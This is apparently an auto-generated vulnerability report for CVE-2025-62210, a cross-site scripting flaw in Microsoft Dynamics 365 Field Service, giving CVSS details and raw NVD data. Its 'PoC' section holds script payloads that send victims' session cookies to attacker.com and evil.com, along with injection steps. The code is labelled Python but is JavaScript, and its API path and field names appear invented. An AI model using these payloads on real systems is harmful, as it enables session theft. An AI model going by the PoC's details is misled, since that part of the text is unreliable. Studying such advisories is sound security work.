Security Vulnerability Report
中文
CVE-2025-62210 CVSS 8.7 HIGH

CVE-2025-62210

Published: 2025-11-11 18:15:48
Last Modified: 2025-11-17 17:41:05

Description

Improper neutralization of input during web page generation ('cross-site scripting') in Dynamics 365 Field Service (online) allows an authorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:dynamics_365:*:*:*:*:field_service:*:*:* - VULNERABLE
Microsoft Dynamics 365 Field Service < 最新安全补丁版本
具体版本信息请参考Microsoft官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-62210 XSS PoC for Microsoft Dynamics 365 Field Service // This PoC demonstrates the stored XSS vulnerability // Malicious payload injection const maliciousPayload = { fieldServiceField: '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>', descriptionField: '<img src=x onerror="fetch(\"https://attacker.com/log?data=\"+btoa(document.cookie))" />' }; // Example: Submitting the payload through API or UI // POST /api/fieldservice/workorders // Content-Type: application/json // { // "description": "<script>document.location='https://evil.com?c='+document.cookie</script>", // "productId": "12345" // } // When victim views the work order, the script executes // Attacker's server receives victim's session cookies console.log('XSS Payload: <script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'); // Recommended verification steps: // 1. Identify input fields in Dynamics 365 Field Service // 2. Inject test payload: <img src=x onerror=alert(document.domain)> // 3. Check if payload is reflected/stored without encoding // 4. Verify with browser DevTools if script executes module.exports = { maliciousPayload };

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62210", "sourceIdentifier": "[email protected]", "published": "2025-11-11T18:15:48.273", "lastModified": "2025-11-17T17:41:05.323", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('cross-site scripting') in Dynamics 365 Field Service (online) allows an authorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:dynamics_365:*:*:*:*:field_service:*:*:*", "versionEndExcluding": "8.8.139.398", "matchCriteriaId": "6EA62CF6-E011-4518-9ED6-C0072E54B2D9"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-62210", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}